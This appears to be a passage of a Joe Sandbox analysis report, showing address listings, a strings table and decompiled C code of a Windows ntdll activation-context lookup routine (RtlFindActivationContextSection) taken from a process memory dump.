                                                                                                                                                                            0x1d8878b1
                                                                                                                                                                            0x1d8878c3
                                                                                                                                                                            0x1d8878c3
                                                                                                                                                                            0x1d8878cb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8878d6
                                                                                                                                                                            0x1d8878dc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8878de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8878de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8878dc
                                                                                                                                                                            0x1d8878c3
                                                                                                                                                                            0x1d8878b1
                                                                                                                                                                            0x1d83a499
                                                                                                                                                                            0x1d83a499
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a499
                                                                                                                                                                            0x1d83a48b
                                                                                                                                                                            0x1d83a37a
                                                                                                                                                                            0x1d83a37a
                                                                                                                                                                            0x1d83a37f
                                                                                                                                                                            0x1d83a381
                                                                                                                                                                            0x1d83a49b
                                                                                                                                                                            0x1d83a49b
                                                                                                                                                                            0x1d83a4a2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a4a8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a4a8
                                                                                                                                                                            0x1d83a387
                                                                                                                                                                            0x1d83a387
                                                                                                                                                                            0x1d83a38c
                                                                                                                                                                            0x1d83a38e
                                                                                                                                                                            0x1d83a38e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a38c
                                                                                                                                                                            0x1d83a381
                                                                                                                                                                            0x1d83a374
                                                                                                                                                                            0x1d83a36c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a363
                                                                                                                                                                            0x1d83a360
                                                                                                                                                                            0x1d83a337
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a32c
                                                                                                                                                                            0x1d8878f1
                                                                                                                                                                            0x1d8878f1
                                                                                                                                                                            0x1d8878fc
                                                                                                                                                                            0x1d887904
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d887904
                                                                                                                                                                            0x1d83a2eb
                                                                                                                                                                            0x1d83a2de
                                                                                                                                                                            0x1d83a2ac
                                                                                                                                                                            0x1d83a28e
                                                                                                                                                                            0x1d83a4cc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a269
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a39c
                                                                                                                                                                            0x1d83a39c
                                                                                                                                                                            0x1d83a39f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a3a5
                                                                                                                                                                            0x1d83a3a8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a3a8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a39f
                                                                                                                                                                            0x1d83a250
                                                                                                                                                                            0x1d83a1e8
                                                                                                                                                                            0x1d83a1f1
                                                                                                                                                                            0x1d8877d8
                                                                                                                                                                            0x1d8877dd
                                                                                                                                                                            0x1d8877e2
                                                                                                                                                                            0x1d8877e7
                                                                                                                                                                            0x1d8877e7
                                                                                                                                                                            0x1d8877e9
                                                                                                                                                                            0x1d8877eb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a1f7
                                                                                                                                                                            0x1d83a1f7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a1f7
                                                                                                                                                                            0x1d83a1f1
                                                                                                                                                                            0x1d83a1e6
                                                                                                                                                                            0x1d83a1dd
                                                                                                                                                                            0x1d83a1d4
                                                                                                                                                                            0x1d83a1cc
                                                                                                                                                                            0x1d83a1c0
                                                                                                                                                                            0x1d83a1b1
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            • Actx , xrefs: 1D887819, 1D887880
                                                                                                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D8877DD, 1D887802
                                                                                                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D887807
                                                                                                                                                                            • SsHd, xrefs: 1D83A304
                                                                                                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8877E2
                                                                                                                                                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1D8878F3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                            • API String ID: 0-1988757188
                                                                                                                                                                            • Opcode ID: 2782f81bcbdc6cf2c3c4bf0ace3e7a7d377fa7c4c5af43592e441c813e323f45
                                                                                                                                                                            • Instruction ID: 7d2bfc57d7d3d33f2690b45cef2c167cbd5294be580ede758e381cdd40bd9a49
                                                                                                                                                                            • Opcode Fuzzy Hash: 2782f81bcbdc6cf2c3c4bf0ace3e7a7d377fa7c4c5af43592e441c813e323f45
                                                                                                                                                                            • Instruction Fuzzy Hash: 94E1BF70A08342AFD715CF68C884B6BB7E5BF84726F104A2DF9698B291D731D845CB83
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                                            			E1D83D690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				char _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				char _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				char _v56;
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				char _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int* _v84;
                                                                                                                                                                            				char _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				char _v93;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				char _v117;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				intOrPtr _t150;
                                                                                                                                                                            				char _t158;
                                                                                                                                                                            				intOrPtr _t160;
                                                                                                                                                                            				intOrPtr _t163;
                                                                                                                                                                            				intOrPtr* _t164;
                                                                                                                                                                            				intOrPtr _t170;
                                                                                                                                                                            				signed int _t171;
                                                                                                                                                                            				void* _t172;
                                                                                                                                                                            				signed int _t195;
                                                                                                                                                                            				intOrPtr* _t201;
                                                                                                                                                                            				signed int _t205;
                                                                                                                                                                            				intOrPtr* _t209;
                                                                                                                                                                            				void* _t210;
                                                                                                                                                                            				intOrPtr _t211;
                                                                                                                                                                            				intOrPtr _t213;
                                                                                                                                                                            				signed int _t214;
                                                                                                                                                                            				intOrPtr* _t215;
                                                                                                                                                                            				intOrPtr _t217;
                                                                                                                                                                            				intOrPtr _t225;
                                                                                                                                                                            				intOrPtr _t227;
                                                                                                                                                                            				intOrPtr _t228;
                                                                                                                                                                            				void* _t233;
                                                                                                                                                                            				intOrPtr* _t234;
                                                                                                                                                                            				signed int _t242;
                                                                                                                                                                            				void* _t246;
                                                                                                                                                                            				signed int _t247;
                                                                                                                                                                            				signed int _t252;
                                                                                                                                                                            				void* _t253;
                                                                                                                                                                            				intOrPtr* _t254;
                                                                                                                                                                            				intOrPtr _t255;
                                                                                                                                                                            				signed int _t256;
                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                            
                                                                                                                                                                            				_t258 = (_t256 & 0xfffffff8) - 0x5c;
                                                                                                                                                                            				_v8 =  *0x1d91b370 ^ _t258;
                                                                                                                                                                            				_t217 =  *[fs:0x18];
                                                                                                                                                                            				_t241 = _a16;
                                                                                                                                                                            				_t209 = _a20;
                                                                                                                                                                            				_t150 =  *((intOrPtr*)(_t217 + 0x30));
                                                                                                                                                                            				_t252 = _a8;
                                                                                                                                                                            				_v84 = _t241;
                                                                                                                                                                            				_v80 = _t209;
                                                                                                                                                                            				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
                                                                                                                                                                            					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t151 = 0xc0150001;
                                                                                                                                                                            						L24:
                                                                                                                                                                            						_pop(_t246);
                                                                                                                                                                            						_pop(_t253);
                                                                                                                                                                            						_pop(_t210);
                                                                                                                                                                            						return E1D864B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L1:
                                                                                                                                                                            				_v88 = 0;
                                                                                                                                                                            				if(_t241 == 0) {
                                                                                                                                                                            					L49:
                                                                                                                                                                            					_t151 = 0xc000000d;
                                                                                                                                                                            					goto L24;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t241 = _a4;
                                                                                                                                                                            				if((_t241 & 0xfffffff8) != 0) {
                                                                                                                                                                            					goto L49;
                                                                                                                                                                            				}
                                                                                                                                                                            				if((_t241 & 0x00000007) == 0) {
                                                                                                                                                                            					if(_t209 != 0) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						if( *_t209 < 0x24) {
                                                                                                                                                                            							goto L49;
                                                                                                                                                                            						}
                                                                                                                                                                            						L6:
                                                                                                                                                                            						if((_t241 & 0x00000002) != 0) {
                                                                                                                                                                            							if(_t209 + 0x2c <=  *_t209 + _t209) {
                                                                                                                                                                            								goto L7;
                                                                                                                                                                            							}
                                                                                                                                                                            							_push(0xc000000d);
                                                                                                                                                                            							_push("RtlpFindActivationContextSection_CheckParameters");
                                                                                                                                                                            							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                                                                                                                            							L48:
                                                                                                                                                                            							_push(0);
                                                                                                                                                                            							_push(0x33);
                                                                                                                                                                            							E1D8AEF10();
                                                                                                                                                                            							_t258 = _t258 + 0x14;
                                                                                                                                                                            							goto L49;
                                                                                                                                                                            						}
                                                                                                                                                                            						L7:
                                                                                                                                                                            						if((_t241 & 0x00000004) != 0) {
                                                                                                                                                                            							if(_t209 + 0x40 <=  *_t209 + _t209) {
                                                                                                                                                                            								goto L8;
                                                                                                                                                                            							}
                                                                                                                                                                            							_push(0xc000000d);
                                                                                                                                                                            							_push("RtlpFindActivationContextSection_CheckParameters");
                                                                                                                                                                            							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                                                                                                                            							goto L48;
                                                                                                                                                                            						}
                                                                                                                                                                            						L8:
                                                                                                                                                                            						_t241 =  &_v76;
                                                                                                                                                                            						_v48 = _a12;
                                                                                                                                                                            						_v60 = 0x18;
                                                                                                                                                                            						_v56 = 0;
                                                                                                                                                                            						_v52 = _t252;
                                                                                                                                                                            						_v40 = 0;
                                                                                                                                                                            						_v64 = 0;
                                                                                                                                                                            						_v44 = 0;
                                                                                                                                                                            						if(E1D83D580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
                                                                                                                                                                            							goto L24;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t151 = 0;
                                                                                                                                                                            						if(0 < 0) {
                                                                                                                                                                            							goto L24;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t158 = _v88;
                                                                                                                                                                            						if(_t158 < 0x28) {
                                                                                                                                                                            							L34:
                                                                                                                                                                            							_t254 = _v76;
                                                                                                                                                                            							L91:
                                                                                                                                                                            							_push(_t158);
                                                                                                                                                                            							E1D8AEF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
                                                                                                                                                                            							_t258 = _t258 + 0x14;
                                                                                                                                                                            							_t151 = 0xc0150003;
                                                                                                                                                                            							goto L24;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t247 = _v64;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							_t254 = _v76;
                                                                                                                                                                            							if( *_t254 != 0x64487347) {
                                                                                                                                                                            								goto L91;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t211 =  *((intOrPtr*)(_t254 + 0x14));
                                                                                                                                                                            							_t160 = 1;
                                                                                                                                                                            							if(_t211 == 0) {
                                                                                                                                                                            								L19:
                                                                                                                                                                            								_t225 =  *[fs:0x18];
                                                                                                                                                                            								_t255 = _v44;
                                                                                                                                                                            								_v92 = 0;
                                                                                                                                                                            								_t247 = 0;
                                                                                                                                                                            								_v68 = _t225;
                                                                                                                                                                            								_t241 =  *(_t225 + 0x30);
                                                                                                                                                                            								_v72 = _t241;
                                                                                                                                                                            								L20:
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									if(_t255 <= 2) {
                                                                                                                                                                            										_t163 = _t255;
                                                                                                                                                                            										if(_t163 == 0) {
                                                                                                                                                                            											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
                                                                                                                                                                            											if(_t164 == 0) {
                                                                                                                                                                            												L43:
                                                                                                                                                                            												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
                                                                                                                                                                            												_v92 = 0;
                                                                                                                                                                            												if(_t213 == 0) {
                                                                                                                                                                            													L28:
                                                                                                                                                                            													_t213 =  *((intOrPtr*)(_t241 + 0x200));
                                                                                                                                                                            													_v92 = 0xfffffffc;
                                                                                                                                                                            													if(_t213 == 0) {
                                                                                                                                                                            														goto L21;
                                                                                                                                                                            													}
                                                                                                                                                                            													_t255 = 3;
                                                                                                                                                                            													_v44 = 3;
                                                                                                                                                                            													L22:
                                                                                                                                                                            													if(_t213 != 0) {
                                                                                                                                                                            														_t241 = _v52;
                                                                                                                                                                            														_t151 = E1D83A600(_t213, _v52, _v48,  &_v76,  &_v88);
                                                                                                                                                                            														if(_t151 < 0) {
                                                                                                                                                                            															if(_t151 != 0xc0150001 || _t255 == 3) {
                                                                                                                                                                            																L32:
                                                                                                                                                                            																if(_t151 < 0) {
                                                                                                                                                                            																	if(_t151 != 0xc0150001) {
                                                                                                                                                                            																		goto L24;
                                                                                                                                                                            																	}
                                                                                                                                                                            																	goto L23;
                                                                                                                                                                            																}
                                                                                                                                                                            																_t158 = _v88;
                                                                                                                                                                            																if(_t158 >= 0x28) {
                                                                                                                                                                            																	goto L12;
                                                                                                                                                                            																}
                                                                                                                                                                            																goto L34;
                                                                                                                                                                            															} else {
                                                                                                                                                                            																_t225 = _v68;
                                                                                                                                                                            																_t241 = _v72;
                                                                                                                                                                            																continue;
                                                                                                                                                                            															}
                                                                                                                                                                            														}
                                                                                                                                                                            														_t241 = _v92;
                                                                                                                                                                            														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
                                                                                                                                                                            														asm("sbb edi, edi");
                                                                                                                                                                            														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
                                                                                                                                                                            														_t151 = 0;
                                                                                                                                                                            														goto L32;
                                                                                                                                                                            													}
                                                                                                                                                                            													L23:
                                                                                                                                                                            													_t151 = 0xc0150008;
                                                                                                                                                                            													goto L24;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t255 = 2;
                                                                                                                                                                            												_v44 = 2;
                                                                                                                                                                            												goto L22;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t170 =  *_t164;
                                                                                                                                                                            											if(_t170 == 0) {
                                                                                                                                                                            												goto L43;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t171 =  *((intOrPtr*)(_t170 + 4));
                                                                                                                                                                            											_v92 = _t171;
                                                                                                                                                                            											if(_t171 == 0) {
                                                                                                                                                                            												L83:
                                                                                                                                                                            												if(_t213 == 0) {
                                                                                                                                                                            													goto L43;
                                                                                                                                                                            												}
                                                                                                                                                                            												L84:
                                                                                                                                                                            												_t255 = 1;
                                                                                                                                                                            												_v44 = 1;
                                                                                                                                                                            												goto L22;
                                                                                                                                                                            											}
                                                                                                                                                                            											if(_t171 != 0xfffffffc) {
                                                                                                                                                                            												if(_t171 != 0xfffffffd) {
                                                                                                                                                                            													_t213 =  *((intOrPtr*)(_t171 + 0x10));
                                                                                                                                                                            													goto L83;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t213 = "Actx ";
                                                                                                                                                                            												goto L84;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t213 =  *((intOrPtr*)(_t241 + 0x200));
                                                                                                                                                                            											goto L83;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t172 = _t163 - 1;
                                                                                                                                                                            										if(_t172 == 0) {
                                                                                                                                                                            											goto L43;
                                                                                                                                                                            										}
                                                                                                                                                                            										if(_t172 != 1) {
                                                                                                                                                                            											goto L21;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L28;
                                                                                                                                                                            									}
                                                                                                                                                                            									L21:
                                                                                                                                                                            									if(_t255 > 3) {
                                                                                                                                                                            										_t151 = 0xc00000e5;
                                                                                                                                                                            										goto L24;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L22;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							if( *((intOrPtr*)(_t254 + 8)) != 1) {
                                                                                                                                                                            								_t160 = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
                                                                                                                                                                            							if(_t227 != 0) {
                                                                                                                                                                            								if(_t160 == 0) {
                                                                                                                                                                            									goto L16;
                                                                                                                                                                            								}
                                                                                                                                                                            								_v92 = 0;
                                                                                                                                                                            								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
                                                                                                                                                                            								_t234 = _t233 + _t254;
                                                                                                                                                                            								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
                                                                                                                                                                            								_v72 = _t234;
                                                                                                                                                                            								if( *_t234 <= 0) {
                                                                                                                                                                            									goto L19;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L54;
                                                                                                                                                                            								}
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									L54:
                                                                                                                                                                            									_t214 =  *_t201 + _t254;
                                                                                                                                                                            									_v68 = _t201 + 4;
                                                                                                                                                                            									if(E1D878050(_t214, _v84, 0x10) == 0x10) {
                                                                                                                                                                            										goto L18;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t205 = _v92 + 1;
                                                                                                                                                                            									_v92 = _t205;
                                                                                                                                                                            									_t201 = _v68;
                                                                                                                                                                            									if(_t205 <  *_v72) {
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L19;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								L16:
                                                                                                                                                                            								_t228 =  *((intOrPtr*)(_t254 + 0x18));
                                                                                                                                                                            								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
                                                                                                                                                                            									_t174 = _t228 + _t254;
                                                                                                                                                                            									_v92 = _t228 + _t254;
                                                                                                                                                                            									while(E1D878050(_t174, _v84, 0x10) != 0x10) {
                                                                                                                                                                            										_t174 = _v92 + 0x1c;
                                                                                                                                                                            										_v92 = _v92 + 0x1c;
                                                                                                                                                                            										_t211 = _t211 - 1;
                                                                                                                                                                            										if(_t211 != 0) {
                                                                                                                                                                            											continue;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L19;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t214 = _v92;
                                                                                                                                                                            									L18:
                                                                                                                                                                            									if(_t214 != 0) {
                                                                                                                                                                            										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
                                                                                                                                                                            											goto L19;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t241 = _v80;
                                                                                                                                                                            										if(_t241 != 0) {
                                                                                                                                                                            											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
                                                                                                                                                                            											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
                                                                                                                                                                            											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
                                                                                                                                                                            											if(_t241 + 0x28 <=  *_t241 + _t241) {
                                                                                                                                                                            												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
                                                                                                                                                                            											_t215 =  *((intOrPtr*)(_t247 + 0x14));
                                                                                                                                                                            											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
                                                                                                                                                                            												_v93 = 0;
                                                                                                                                                                            												 *0x1d9191e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
                                                                                                                                                                            												 *_t215();
                                                                                                                                                                            												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
                                                                                                                                                                            												_t241 = _v104;
                                                                                                                                                                            												if(_v117 != 0) {
                                                                                                                                                                            													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            										if(_t241 == 0 || E1D824428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
                                                                                                                                                                            											_t151 = 0;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L24;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L19;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t242 = _v84;
                                                                                                                                                                            								_v36 =  *_t242;
                                                                                                                                                                            								_v32 =  *((intOrPtr*)(_t242 + 4));
                                                                                                                                                                            								_v28 =  *((intOrPtr*)(_t242 + 8));
                                                                                                                                                                            								_v24 =  *((intOrPtr*)(_t242 + 0xc));
                                                                                                                                                                            								_t195 = E1D868170( &_v36, _t228 + _t254, _t211, 0x1c, E1D81B600);
                                                                                                                                                                            								_t258 = _t258 + 0x14;
                                                                                                                                                                            								_t214 = _t195;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L18;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L91;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t209 == 0) {
                                                                                                                                                                            					goto L49;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L5;
                                                                                                                                                                            			}




























































                                                                                                                                                                            0x1d83d698
                                                                                                                                                                            0x1d83d6a2
                                                                                                                                                                            0x1d83d6a6
                                                                                                                                                                            0x1d83d6ad
                                                                                                                                                                            0x1d83d6b1
                                                                                                                                                                            0x1d83d6b4
                                                                                                                                                                            0x1d83d6b8
                                                                                                                                                                            0x1d83d6c3
                                                                                                                                                                            0x1d83d6c7
                                                                                                                                                                            0x1d83d6cb
                                                                                                                                                                            0x1d83d90e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88913f
                                                                                                                                                                            0x1d88913f
                                                                                                                                                                            0x1d83d847
                                                                                                                                                                            0x1d83d84b
                                                                                                                                                                            0x1d83d84c
                                                                                                                                                                            0x1d83d84d
                                                                                                                                                                            0x1d83d858
                                                                                                                                                                            0x1d83d858
                                                                                                                                                                            0x1d83d90e
                                                                                                                                                                            0x1d83d6d1
                                                                                                                                                                            0x1d83d6d1
                                                                                                                                                                            0x1d83d6db
                                                                                                                                                                            0x1d889164
                                                                                                                                                                            0x1d889164
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889164
                                                                                                                                                                            0x1d83d6e1
                                                                                                                                                                            0x1d83d6ea
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d6f3
                                                                                                                                                                            0x1d83d8fc
                                                                                                                                                                            0x1d83d701
                                                                                                                                                                            0x1d83d704
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d70a
                                                                                                                                                                            0x1d83d70d
                                                                                                                                                                            0x1d83d922
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889149
                                                                                                                                                                            0x1d88914e
                                                                                                                                                                            0x1d889153
                                                                                                                                                                            0x1d889158
                                                                                                                                                                            0x1d889158
                                                                                                                                                                            0x1d88915a
                                                                                                                                                                            0x1d88915c
                                                                                                                                                                            0x1d889161
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889161
                                                                                                                                                                            0x1d83d713
                                                                                                                                                                            0x1d83d716
                                                                                                                                                                            0x1d83d936
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88916e
                                                                                                                                                                            0x1d889173
                                                                                                                                                                            0x1d889178
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889178
                                                                                                                                                                            0x1d83d71c
                                                                                                                                                                            0x1d83d71f
                                                                                                                                                                            0x1d83d723
                                                                                                                                                                            0x1d83d72f
                                                                                                                                                                            0x1d83d73c
                                                                                                                                                                            0x1d83d745
                                                                                                                                                                            0x1d83d749
                                                                                                                                                                            0x1d83d751
                                                                                                                                                                            0x1d83d759
                                                                                                                                                                            0x1d83d768
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d76e
                                                                                                                                                                            0x1d83d772
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d778
                                                                                                                                                                            0x1d83d77f
                                                                                                                                                                            0x1d83d8f1
                                                                                                                                                                            0x1d83d8f1
                                                                                                                                                                            0x1d889370
                                                                                                                                                                            0x1d889370
                                                                                                                                                                            0x1d88937b
                                                                                                                                                                            0x1d889380
                                                                                                                                                                            0x1d889383
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889383
                                                                                                                                                                            0x1d83d785
                                                                                                                                                                            0x1d83d790
                                                                                                                                                                            0x1d83d790
                                                                                                                                                                            0x1d83d790
                                                                                                                                                                            0x1d83d79a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d7a0
                                                                                                                                                                            0x1d83d7a3
                                                                                                                                                                            0x1d83d7a7
                                                                                                                                                                            0x1d83d80d
                                                                                                                                                                            0x1d83d80d
                                                                                                                                                                            0x1d83d816
                                                                                                                                                                            0x1d83d81c
                                                                                                                                                                            0x1d83d820
                                                                                                                                                                            0x1d83d822
                                                                                                                                                                            0x1d83d826
                                                                                                                                                                            0x1d83d829
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d830
                                                                                                                                                                            0x1d83d833
                                                                                                                                                                            0x1d83d85d
                                                                                                                                                                            0x1d83d860
                                                                                                                                                                            0x1d8892e0
                                                                                                                                                                            0x1d8892e8
                                                                                                                                                                            0x1d83d941
                                                                                                                                                                            0x1d83d941
                                                                                                                                                                            0x1d83d949
                                                                                                                                                                            0x1d83d94f
                                                                                                                                                                            0x1d83d874
                                                                                                                                                                            0x1d83d874
                                                                                                                                                                            0x1d83d87a
                                                                                                                                                                            0x1d83d884
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83d886
                                                                                                                                                                            0x1d83d88b
                                                                                                                                                                            0x1d83d83e
                                                                                                                                                                            0x1d83d840
                                                                                                                                                                            0x1d83d891
                                                                                                                                                                            0x1d83d8a5
                                                                                                                                                                            0x1d83d8ac
                                                                                                                                                                            0x1d88933a
                                                                                                                                                                            0x1d83d8dc
                                                                                                                                                                            0x1d83d8de
                                                                                                                                                                            0x1d88935b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889361
                                                                                                                                                                            0x1d83d8e4
                                                                                                                                                                            0x1d83d8eb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889349
                                                                                                                                                                            0x1d889349
                                                                                                                                                                            0x1d88934d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88934d
                                                                                                                                                                            0x1d88933a
                                                                                                                                                                            0x1d83d8b2
                                                                                                                                                                            0x1d83d8d2
